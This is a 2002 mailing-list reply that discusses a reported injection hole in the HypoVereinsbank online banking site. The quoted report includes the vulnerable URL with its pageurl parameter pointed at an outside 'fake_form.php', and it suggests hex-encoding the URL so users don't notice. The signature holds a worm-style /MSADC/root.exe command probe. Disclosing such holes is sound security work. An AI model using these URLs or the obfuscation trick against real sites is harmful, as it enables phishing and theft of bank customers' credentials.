Re: security issue at hypovereins bank

[Dominik Birk <dominik () code-foundation de>]

At 12:12 05.04.02 +0200, hnz geeratz[room23] wrote:
> hello

good evening hnz

> I found this security issue on the german hypovereins bank.

I'm from Germany and there was a gap like this in the hypovereinsbank site 
a few months ago.

> They are informed vor 3 months ago , still there is nothing changed.
> The security hole will allow a atacker to include his own forms in the
> website. This will give him an option to collect sensible information.
> It  is a home bankin system!

I think you can call this security hole CSS (cross-site-scripting). At this 
moment I would like to appeal to the paper of Obscure.

http://eyeonsecurity.net/papers/Extended%20HTML%20Form%20Attack.htm

The german version is under 
http://www.code-foundation.de/archiv/form_attack.htm

> take a look at this (long) URL:
> http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu
>
> now it is possible to change the
> pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu
> part to something like pageurl=http://www.evol.org/fake_form.php
>
> ore try :
> http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=http://www.google.de
>
> so it is possible to include everything in this webpage.
> The attacker could obscure the url in a form like:
> pageurl=h%74t%70%3A%2Fw%77w%77............
> so the user will not notice that the include form is not from the original
> server

Yes, you are right. This is a really bad security hole an in my opinion it 
is negligent to let shit hole open. The Hypovereinsbank is a great bank in 
Germany.

> It opens a port to a new form of social hacking and data grabbing.

ACK. I'm very astonished about the negligence of several System Admins.

> greetings hnz g

Sincerely

Dominik Birk


--
http://www.code-foundation.de
217.229.69.207 - - [14/Oct/2001:02:29:41 +0200] "GET
/MSADC/root.exe?/c+dir

Microsoft? Where do you want to surf today?